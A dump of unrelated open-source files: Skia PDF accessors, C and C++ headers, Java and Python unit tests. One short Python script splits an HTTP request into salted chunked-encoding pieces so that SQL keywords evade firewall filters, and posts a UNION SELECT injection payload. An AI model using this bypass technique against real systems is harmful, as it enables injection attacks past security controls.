SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue(); // TODO(edisonn): warn about missing default value for optional fields return SkPdfFunction(); } bool SkPdfGraphicsStateDictionary::isTR2AArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isArray(); } SkPdfArray* SkPdfGraphicsStateDictionary::getTR2AsArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isArray()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfArray*)ret; // TODO(edisonn): warn about missing default value for optional fields return NULL; } bool SkPdfGraphicsStateDictionary::isTR2AName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); } SkString SkPdfGraphicsStateDictionary::getTR2AsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2(); // TODO(edisonn): warn about missing default value for optional fields return SkString(); } bool SkPdfGraphicsStateDictionary::has_TR2() const { return get("TR2", "") != NULL; } bool SkPdfGraphicsStateDictionary::isHTADictionary(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isDictionary(); } SkPdfDictionary* SkPdfGraphicsStateDictionary::getHTAsDictionary(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isDictionary()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfDictionary*)ret; // TODO(edisonn): warn about missing default value for optional fields return NULL; } bool SkPdfGraphicsStateDictionary::isHTAStream(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->hasStream(); } SkPdfStream* SkPdfGraphicsStateDictionary::getHTAsStream(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->hasStream()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->getStream(); // TODO(edisonn): warn about missing default value for optional fields return NULL; } bool SkPdfGraphicsStateDictionary::isHTAName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); } SkString SkPdfGraphicsStateDictionary::getHTAsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2(); // TODO(edisonn): warn about missing default value for optional fields return SkString(); } bool SkPdfGraphicsStateDictionary::has_HT() const { return get("HT", "") != NULL; } double SkPdfGraphicsStateDictionary::FL(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("FL", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue(); // TODO(edisonn): warn about missing default value for optional fields return 0; } bool SkPdfGraphicsStateDictionary::has_FL() const { return get("FL", "") != NULL; } double SkPdfGraphicsStateDictionary::SM(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SM", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue(); // TODO(edisonn): warn about missing default value for optional fields return 0; } bool SkPdfGraphicsStateDictionary::has_SM() const { return get("SM", "") != NULL; } bool SkPdfGraphicsStateDictionary::SA(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SA", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isBoolean()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->boolValue(); // TODO(edisonn): warn about missing default value for optional fields return false; } bool SkPdfGraphicsStateDictionary::has_SA() const { return get("SA", "") != NULL; } bool SkPdfGraphicsStateDictionary::isBMAName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BM", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); } SkString SkPdfGraphicsStateDictionary::getBMAsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BM", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2(); // TODO(edisonn): warn about missing default value for optional fields return SkString(); } bool SkPdfGraphicsStateDictionary::isBMAArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BM", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isArray(); } SkPdfArray* SkPdfGraphicsStateDictionary::getBMAsArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BM", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isArray()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfArray*)ret; // TODO(edisonn): warn about missing default value for optional fields return NULL; } bool SkPdfGraphicsStateDictionary::has_BM() const { return get("BM", "") != NULL; } bool SkPdfGraphicsStateDictionary::isSMaskADictionary(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SMask", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isDictionary(); } SkPdfDictionary* SkPdfGraphicsStateDictionary::getSMaskAsDictionary(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SMask", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isDictionary()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfDictionary*)ret; // TODO(edisonn): warn about missing default value for optional fields return NULL; } bool SkPdfGraphicsStateDictionary::isSMaskAName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SMask", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); } SkString SkPdfGraphicsStateDictionary::getSMaskAsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SMask", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2(); // TODO(edisonn): warn about missing default value for optional fields return SkString(); } bool SkPdfGraphicsStateDictionary::has_SMask() const { return get("SMask", "") != NULL; } double SkPdfGraphicsStateDictionary::CA(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("CA", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue(); // TODO(edisonn): warn about missing default value for optional fields return 0; } bool SkPdfGraphicsStateDictionary::has_CA() const { return get("CA", "") != NULL; } double SkPdfGraphicsStateDictionary::ca(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("ca", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue(); // TODO(edisonn): warn about missing default value for optional fields return 0; } bool SkPdfGraphicsStateDictionary::has_ca() const { return get("ca", "") != NULL; } bool SkPdfGraphicsStateDictionary::AIS(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("AIS", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isBoolean()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->boolValue(); // TODO(edisonn): warn about missing default value for optional fields return false; } bool SkPdfGraphicsStateDictionary::has_AIS() const { return get("AIS", "") != NULL; } bool SkPdfGraphicsStateDictionary::TK(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TK", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isBoolean()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->boolValue(); // TODO(edisonn): warn about missing default value for optional fields return false; } bool SkPdfGraphicsStateDictionary::has_TK() const { return get("TK", "") != NULL; }
6,708
2,508
<gh_stars>1000+ extern zend_class_entry *stub_oo_extend_exception_ce; ZEPHIR_INIT_CLASS(Stub_Oo_Extend_Exception);
55
333
#ifndef RS_FILE_OPENDIR_HPP #define RS_FILE_OPENDIR_HPP #include "rodsConnect.h" #include "fileOpendir.h" int rsFileOpendir( rsComm_t *rsComm, fileOpendirInp_t *fileOpendirInp ); int _rsFileOpendir( rsComm_t *rsComm, fileOpendirInp_t *fileOpendirInp, void **dirPtr ); int remoteFileOpendir( rsComm_t *rsComm, fileOpendirInp_t *fileOpendirInp, rodsServerHost_t *rodsServerHost ); #endif
168
544
package com.patloew.rxlocation; import android.app.Activity; import android.content.Intent; import android.content.IntentSender; import com.google.android.gms.common.api.Status; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.mockito.Mock; import org.mockito.MockitoAnnotations; import org.powermock.api.mockito.PowerMockito; import org.powermock.core.classloader.annotations.PrepareOnlyThisForTest; import org.powermock.modules.junit4.PowerMockRunner; import java.util.UUID; import static org.mockito.Mockito.doAnswer; import static org.mockito.Mockito.doReturn; import static org.mockito.Mockito.doThrow; import static org.mockito.Mockito.verify; import static org.powermock.api.mockito.PowerMockito.spy; @RunWith(PowerMockRunner.class) @PrepareOnlyThisForTest({ SettingsCheckHandleSingleOnSubscribe.class, Status.class }) public class LocationSettingsActivityTest { @Mock Status status; @Mock Intent intent; LocationSettingsActivity activity; final String observableId = UUID.randomUUID().toString(); @Before public void setup() throws Exception { MockitoAnnotations.initMocks(this); PowerMockito.spy(SettingsCheckHandleSingleOnSubscribe.class); activity = spy(new LocationSettingsActivity()); doReturn(observableId).when(intent).getStringExtra(LocationSettingsActivity.ARG_ID); doReturn(status).when(intent).getParcelableExtra(LocationSettingsActivity.ARG_STATUS); doReturn(intent).when(activity).getIntent(); } @Test public void onCreate() { activity.onCreate(null); doAnswer(invocation -> null).when(activity).handleIntent(); verify(activity).handleIntent(); } @Test public void onNewIntent() { activity.onNewIntent(intent); doAnswer(invocation -> null).when(activity).handleIntent(); verify(activity).setIntent(intent); verify(activity).handleIntent(); } @Test public void handleIntent() throws IntentSender.SendIntentException { activity.handleIntent(); verify(status).startResolutionForResult(activity, LocationSettingsActivity.REQUEST_CODE_RESOLUTION); } @Test public void handleIntent_SendIntentException() throws IntentSender.SendIntentException { doThrow(new IntentSender.SendIntentException()).when(status).startResolutionForResult(activity, LocationSettingsActivity.REQUEST_CODE_RESOLUTION); activity.handleIntent(); } @Test public void onActivityResult() { activity.onActivityResult(LocationSettingsActivity.REQUEST_CODE_RESOLUTION, Activity.RESULT_OK, null); verify(activity).setResolutionResultAndFinish(Activity.RESULT_OK); } @Test public void onActivityResult_wrongRequestCode() { activity.onActivityResult(-123, Activity.RESULT_OK, null); verify(activity).setResolutionResultAndFinish(Activity.RESULT_CANCELED); } @Test public void setResolutionResultAndFinish_OK() { activity.setResolutionResultAndFinish(Activity.RESULT_OK); PowerMockito.verifyStatic(SettingsCheckHandleSingleOnSubscribe.class); SettingsCheckHandleSingleOnSubscribe.onResolutionResult(observableId, Activity.RESULT_OK); verify(activity).finish(); } @Test public void setResolutionResultAndFinish_Canceled() { activity.setResolutionResultAndFinish(Activity.RESULT_CANCELED); PowerMockito.verifyStatic(SettingsCheckHandleSingleOnSubscribe.class); SettingsCheckHandleSingleOnSubscribe.onResolutionResult(observableId, Activity.RESULT_CANCELED); verify(activity).finish(); } }
1,310
679
<reponame>Grosskopf/openoffice<gh_stars>100-1000 /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef INCLUDED_DRAWINGLAYER_PRIMITIVE2D_MARKERARRAYPRIMITIVE2D_HXX #define INCLUDED_DRAWINGLAYER_PRIMITIVE2D_MARKERARRAYPRIMITIVE2D_HXX #include <drawinglayer/drawinglayerdllapi.h> #include <drawinglayer/primitive2d/baseprimitive2d.hxx> #include <basegfx/color/bcolor.hxx> #include <vcl/bitmapex.hxx> ////////////////////////////////////////////////////////////////////////////// // MarkerArrayPrimitive2D class namespace drawinglayer { namespace primitive2d { /** MarkerArrayPrimitive2D class This primtive defines an array of markers. Their size is defined in pixels and independent from the view transformation which makes this primitive highly view-dependent. It is also transformation invariant, so that the bitmap is always visualized unscaled and unrotated. It is used e.g. for grid position visualisation. The given Bitmap (with transparence) is defined to be visible centered at each of the given positions. It decomposes to the needed number of BitmapPrimitive2D's, so it would be efficient to handle it directly in a renderer. */ class DRAWINGLAYER_DLLPUBLIC MarkerArrayPrimitive2D : public BufferedDecompositionPrimitive2D { private: /// the positions for the marker std::vector< basegfx::B2DPoint > maPositions; /// the marker definintion to visualize BitmapEx maMarker; protected: /// create local decomposition virtual Primitive2DSequence create2DDecomposition(const geometry::ViewInformation2D& rViewInformation) const; public: /// constructor MarkerArrayPrimitive2D( const std::vector< basegfx::B2DPoint >& rPositions, const BitmapEx& rMarker); /// data read access const std::vector< basegfx::B2DPoint >& getPositions() const { return maPositions; } const BitmapEx& getMarker() const { return maMarker; } /// compare operator virtual bool operator==(const BasePrimitive2D& rPrimitive) const; /// get range virtual basegfx::B2DRange getB2DRange(const geometry::ViewInformation2D& rViewInformation) const; /// provide unique ID DeclPrimitrive2DIDBlock() }; } // end of namespace primitive2d } // end of namespace drawinglayer ////////////////////////////////////////////////////////////////////////////// #endif //INCLUDED_DRAWINGLAYER_PRIMITIVE2D_MARKERARRAYPRIMITIVE2D_HXX ////////////////////////////////////////////////////////////////////////////// // eof
1,157
634
<filename>server/data/data-jmap-cassandra/src/test/java/org/apache/james/jmap/cassandra/filtering/DTOTest.java<gh_stars>100-1000 /**************************************************************** * Licensed to the Apache Software Foundation (ASF) under one * * or more contributor license agreements. See the NOTICE file * * distributed with this work for additional information * * regarding copyright ownership. The ASF licenses this file * * to you under the Apache License, Version 2.0 (the * * "License"); you may not use this file except in compliance * * with the License. You may obtain a copy of the License at * * * * http://www.apache.org/licenses/LICENSE-2.0 * * * * Unless required by applicable law or agreed to in writing, * * software distributed under the License is distributed on an * * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * * KIND, either express or implied. See the License for the * * specific language governing permissions and limitations * * under the License. * ****************************************************************/ package org.apache.james.jmap.cassandra.filtering; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_1; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_2; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_FROM; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_RECIPIENT; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_SUBJECT; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_TO; import static org.apache.james.jmap.cassandra.filtering.FilteringRuleSetDefineDTOModules.FILTERING_RULE_SET_DEFINED; import org.apache.james.JsonSerializationVerifier; import org.apache.james.core.Username; import org.apache.james.eventsourcing.EventId; import org.apache.james.jmap.api.filtering.impl.FilteringAggregateId; import org.apache.james.jmap.api.filtering.impl.RuleSetDefined; import org.apache.james.util.ClassLoaderUtils; import org.junit.jupiter.api.Test; import com.google.common.collect.ImmutableList; class DTOTest { static final String EVENT_JSON = ClassLoaderUtils.getSystemResourceAsString("json/event.json"); static final String EVENT_EMPTY_JSON = ClassLoaderUtils.getSystemResourceAsString("json/eventEmpty.json"); static final String EVENT_COMPLEX_JSON = ClassLoaderUtils.getSystemResourceAsString("json/eventComplex.json"); static final RuleSetDefined SIMPLE_RULE = new RuleSetDefined( new FilteringAggregateId(Username.of("Bart")), EventId.first(), ImmutableList.of(RULE_1, RULE_2)); static final RuleSetDefined EMPTY_RULE = new RuleSetDefined( new FilteringAggregateId(Username.of("Bart")), EventId.first(), ImmutableList.of()); static final RuleSetDefined COMPLEX_RULE = new RuleSetDefined( new FilteringAggregateId(Username.of("Bart")), EventId.first(), ImmutableList.of(RULE_FROM, RULE_RECIPIENT, RULE_SUBJECT, RULE_TO)); @Test void shouldSerializeRule() throws Exception { JsonSerializationVerifier.dtoModule(FILTERING_RULE_SET_DEFINED) .testCase(EMPTY_RULE, EVENT_EMPTY_JSON) .testCase(SIMPLE_RULE, EVENT_JSON) .testCase(COMPLEX_RULE, EVENT_COMPLEX_JSON) .verify(); } }
1,485
379
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # @Time : 2019/3/9 10:21 PM # @Author : w8ay # @File : auto_build_chunked.py # 根据payload内容自动生成分块,自动分割关键字 # chunk_size控制到1-9之内,遇到关键词自动切割 import string import HackRequests import random def chunk_data(data, keywords: list): dl = len(data) ret = "" index = 0 while index < dl: chunk_size = random.randint(1, 9) if index + chunk_size >= dl: chunk_size = dl - index salt = ''.join(random.sample(string.ascii_letters + string.digits, 5)) while 1: tmp_chunk = data[index:index + chunk_size] tmp_bool = True for k in keywords: if k in tmp_chunk: chunk_size -= 1 tmp_bool = False break if tmp_bool: break index += chunk_size ret += "{0};{1}\r\n".format(hex(chunk_size)[2:], salt) ret += "{0}\r\n".format(tmp_chunk) ret += "0\r\n\r\n" return ret payload = "id=-1' and union select user(),2,3,4,5 from table" keywords = ['and', 'union', 'select', 'user', 'from'] data = chunk_data(payload, keywords) raw = ''' POST /post HTTP/1.1 Host: httpbin.org Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Transfer-Encoding: Chunked {} '''.format(data) hack = HackRequests.hackRequests() r = hack.httpraw(raw) print(raw) print(r.text()) print(r.log)
908
1,131
// Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. package common; import java.awt.event.KeyEvent; import java.awt.event.KeyListener; import streamer.BaseElement; import streamer.ByteBuffer; public class AwtKeyEventSource extends BaseElement implements KeyListener { public AwtKeyEventSource(String id) { super(id); } @Override public void keyTyped(KeyEvent e) { // Nothing to do } @Override public void keyPressed(KeyEvent e) { sendEvent(e, true); } @Override public void keyReleased(KeyEvent e) { sendEvent(e, false); } private void sendEvent(KeyEvent e, boolean pressed) { ByteBuffer buf = new ByteBuffer(new KeyOrder(e, pressed)); pushDataToAllOuts(buf); } }
471
326
<reponame>tristansgray/simian #!/usr/bin/env python # # Copyright 2018 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """client module tests.""" import httplib import logging import sys from pyfakefs import fake_filesystem import M2Crypto import mock import stubout from google.apputils import app from google.apputils import basetest from simian import auth from simian.client import client class ClientModuleTest(basetest.TestCase): """Test the client module.""" def testConstants(self): for a in [ 'SERVER_HOSTNAME', 'SERVER_PORT', 'AUTH_DOMAIN', 'CLIENT_SSL_PATH', 'SEEK_SET', 'SEEK_CUR', 'SEEK_END', 'DEBUG', 'URL_UPLOADPKG']: self.assertTrue(hasattr(client, a)) class MultiBodyConnectionTest(basetest.TestCase): """Test MultiBodyConnection class.""" def setUp(self): super(MultiBodyConnectionTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.mbc = client.MultiBodyConnection() def tearDown(self): super(MultiBodyConnectionTest, self).tearDown() self.stubs.UnsetAll() def testSetProgressCallback(self): """Test SetProgressCallback().""" fn = lambda x: 1 self.assertFalse(hasattr(self.mbc, '_progress_callback')) self.mbc.SetProgressCallback(fn) self.assertEqual(self.mbc._progress_callback, fn) self.assertRaises( client.Error, self.mbc.SetProgressCallback, 1) def testProgressCallback(self): """Test _ProgressCallback().""" self.mbc._ProgressCallback(1, 2) self.mbc._progress_callback = mock.Mock() self.mbc._ProgressCallback(1, 2) self.mbc._progress_callback.assert_called_with(1, 2) @mock.patch.object(client.httplib.HTTPConnection, 'request') def testRequest(self, mock_request): """Test request().""" fs = fake_filesystem.FakeFilesystem() fake_os = fake_filesystem.FakeOsModule(fs) fake_open = fake_filesystem.FakeFileOpen(fs) file_name = '/f1' file_size = 10000 f_body = 'x' * file_size fs.CreateFile(file_name, contents=f_body) fake_file = fake_open(file_name, 'r') self.stubs.Set(client, 'os', fake_os) method = 'GET' url = '/foo' body = ['hello', fake_file] content_length = len(body[0]) + file_size headers = { 'Content-Length': content_length, } self.mbc._is_https = False self.mbc.send = mock.Mock() self.mbc._ProgressCallback = mock.Mock() inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_request, 'request') inorder_calls.attach_mock(self.mbc.send, 'send') inorder_calls.attach_mock(self.mbc._ProgressCallback, '_ProgressCallback') self.mbc.request(method, url, body=body) inorder_calls.assert_has_calls([ mock.call.request(self.mbc, method, url, headers=headers), mock.call._ProgressCallback(0, content_length), mock.call.send(body[0]), mock.call._ProgressCallback(len(body[0]), content_length), mock.call.send(f_body[:8192]), mock.call._ProgressCallback(len(body[0]) + 8192, content_length), mock.call.send(f_body[8192:]), mock.call._ProgressCallback(len(body[0]) + file_size, content_length), mock.call._ProgressCallback(len(body[0]) + file_size, content_length)]) class HTTPSMultiBodyConnectionTest(basetest.TestCase): def setUp(self): self.stubs = stubout.StubOutForTesting() self.hostname = 'foohost' self.mbc = client.HTTPSMultiBodyConnection(self.hostname) def tearDown(self): self.stubs.UnsetAll() def testParentClassRequestAssumption(self): """Test assumptions of parent class request().""" method = 'GET' url = '/foo' body = None headers = {} with mock.patch.object( client.httplib.HTTPConnection, '_send_request', return_value=-1) as mock_fn: c = client.httplib.HTTPConnection(self.hostname) self.assertEqual(None, c.request(method, url)) mock_fn.assert_called_once_with(method, url, body, headers) @mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True) @mock.patch.object(client.httplib.HTTPConnection, 'endheaders') @mock.patch.object(client.httplib.HTTPConnection, 'putheader') @mock.patch.object(client.httplib.HTTPConnection, 'putrequest') def testParentClassSendRequestAssumptionEmptyBody( self, putrequest_mock, putheader_mock, endheaders_mock, send_mock): """Test assumptions of parent class _send_request().""" method = 'GET' url = '/foo' body1 = None headers = {'foo': 'bar'} inorder_calls = mock.Mock() inorder_calls.attach_mock(putrequest_mock, 'putrequest') inorder_calls.attach_mock(putheader_mock, 'putheader') inorder_calls.attach_mock(endheaders_mock, 'endheaders') inorder_calls.attach_mock(send_mock, 'send') # with a None body supplied, send() is never called. on >=2.7 # endheaders is still called with the body contents, even if they # are None. c = client.httplib.HTTPConnection(self.hostname) c._send_request(method, url, body1, headers) expected = [ mock.call.putrequest(method, url), mock.call.putheader('foo', headers['foo']) ] if sys.version_info[0] >= 2 and sys.version_info[1] >= 7: expected.append(mock.call.endheaders(body1)) else: expected.append(mock.call.endheaders()) inorder_calls.assert_has_calls(expected) @mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True) @mock.patch.object(client.httplib.HTTPConnection, 'endheaders') @mock.patch.object(client.httplib.HTTPConnection, 'putheader') @mock.patch.object(client.httplib.HTTPConnection, 'putrequest') def testParentClassSendRequestAssumption( self, putrequest_mock, putheader_mock, endheaders_mock, send_mock): """Test assumptions of parent class _send_request().""" method = 'GET' url = '/foo' body2 = 'howdy' headers = {'foo': 'bar'} inorder_calls = mock.Mock() inorder_calls.attach_mock(putrequest_mock, 'putrequest') inorder_calls.attach_mock(putheader_mock, 'putheader') inorder_calls.attach_mock(endheaders_mock, 'endheaders') inorder_calls.attach_mock(send_mock, 'send') # with a body supplied, send() is called inside _send_request() on # httplib < 2.6. in >=2.7 endheaders() sends the body and headers # all at once. expected = [ mock.call.putrequest(method, url), mock.call.putheader('Content-Length', str(len(body2))), mock.call.putheader('foo', headers['foo']) ] if sys.version_info[0] >= 2 and sys.version_info[1] >= 7: expected.append(mock.call.endheaders(body2)) else: expected.append(mock.call.endheaders()) expected.append(mock.send(body2)) c = client.httplib.HTTPConnection(self.hostname) c._send_request(method, url, body2, headers) inorder_calls.assert_has_calls(expected) def testDirectSendTypes(self): """Test the DIRECT_SEND_TYPES constant for sane values.""" self.assertTrue(type(self.mbc.DIRECT_SEND_TYPES) is list) @mock.patch.object(client.httplib.HTTPConnection, 'request') @mock.patch.object(client.httplib.HTTPConnection, 'send') def testRequestSimple(self, mock_send, mock_request): """Test request with one body element.""" method = 'GET' url = '/foo' body = 'hello' headers = { 'Content-Length': len(body), 'Host': self.hostname, } self.mbc.request(method, url, body=body) mock_request.assert_called_once_with( self.mbc, method, url, headers=headers) mock_send.assert_called_once_with(body) @mock.patch.object(client.httplib.HTTPConnection, 'request') @mock.patch.object(client.httplib.HTTPConnection, 'send') def testRequestMultiString(self, send_mock, request_mock): """Test request() with multiple body string elements.""" method = 'GET' url = '/foo' body = ['hello', 'there'] headers = { 'Content-Length': sum(map(len, body)), 'Host': self.hostname, } for s in body: client.httplib.HTTPConnection.send(s).AndReturn(None) self.mbc.request(method, url, body=body) request_mock.assert_called_once_with(self.mbc, method, url, headers=headers) send_mock.assert_has_calls([mock.call(x) for x in body]) @mock.patch.object(client.httplib.HTTPConnection, 'send') @mock.patch.object(client.httplib.HTTPConnection, 'request') def testRequestMultiMixed(self, request_mock, send_mock): """Test request() with multiple mixed body elements.""" filepath = '/somefilename' f_body = 'there' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(filepath, contents=f_body) fake_open = fake_filesystem.FakeFileOpen(fs) f = fake_open(filepath) method = 'GET' url = '/foo' body = ['hello', f] content_length = len(body[0]) + len(f_body) headers = { 'Content-Length': content_length, 'Host': self.hostname, } self.mbc.request(method, url, body=body) request_mock.assert_called_once_with(self.mbc, method, url, headers=headers) self.assertEqual(2, send_mock.call_count) send_mock.assert_has_calls([mock.call(body[0]), mock.call(f_body)]) def testSetCACertChain(self): """Test SetCACertChain().""" self.mbc.SetCACertChain('foo') self.assertEqual(self.mbc._ca_cert_chain, 'foo') def testIsValidCert(self): """Test _IsValidCert().""" self.assertEqual(1, self.mbc._IsValidCert(1, 1)) def testIsValidCertOkZero(self): """Test _IsValidCert().""" cert = mock.create_autospec(M2Crypto.X509.X509) cert_subject = mock.create_autospec(M2Crypto.X509.X509_Name) store = mock.create_autospec(M2Crypto.X509.X509_Store_Context) store.get_current_cert.return_value = cert cert.get_subject.return_value = cert_subject cert_subject.__str__.return_value = 'valid' self.assertEqual(0, self.mbc._IsValidCert(0, store)) cert_subject.__str__.assert_called() @mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True) def testLoadCACertChain(self, named_temporary_file_mock): """Test _LoadCACertChain().""" temp_filepath = '/tmp/somefilename' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(temp_filepath) fake_open = fake_filesystem.FakeFileOpen(fs) tf = fake_open(temp_filepath, 'w') named_temporary_file_mock.return_value = tf ctx = mock.create_autospec(M2Crypto.SSL.Context) ctx.load_verify_locations.return_value = 1 cert_chain = 'cert chain la la ..' self.mbc._ca_cert_chain = cert_chain self.mbc._LoadCACertChain(ctx) self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read()) # mock 2.0.0 incorrectly binds spec to calls ctx._spec_signature = None ctx.assert_has_calls([ mock.call.load_verify_locations(cafile=tf.name), mock.call.set_verify( client.SSL.verify_peer | client.SSL.verify_fail_if_no_peer_cert, depth=9, callback=self.mbc._IsValidCert)]) @mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True) def testLoadCACertChainWhenLoadError(self, named_temporary_file_mock): """Test _LoadCACertChain().""" temp_filepath = '/tmp/somefilename' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(temp_filepath) fake_open = fake_filesystem.FakeFileOpen(fs) tf = fake_open(temp_filepath, 'w') named_temporary_file_mock.return_value = tf cert_chain = 'cert chain la la ..' self.mbc._ca_cert_chain = cert_chain ctx = mock.create_autospec(M2Crypto.SSL.Context) self.assertRaises( client.SimianClientError, self.mbc._LoadCACertChain, ctx) ctx.load_verify_locations.assert_called_once_with(cafile=tf.name) self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read()) def testLoadCACertChainWhenNone(self): """Test _LoadCACertChain().""" self.assertRaises( client.SimianClientError, self.mbc._LoadCACertChain, mock.MagicMock()) @mock.patch.object(client.SSL, 'Context', autospec=True) 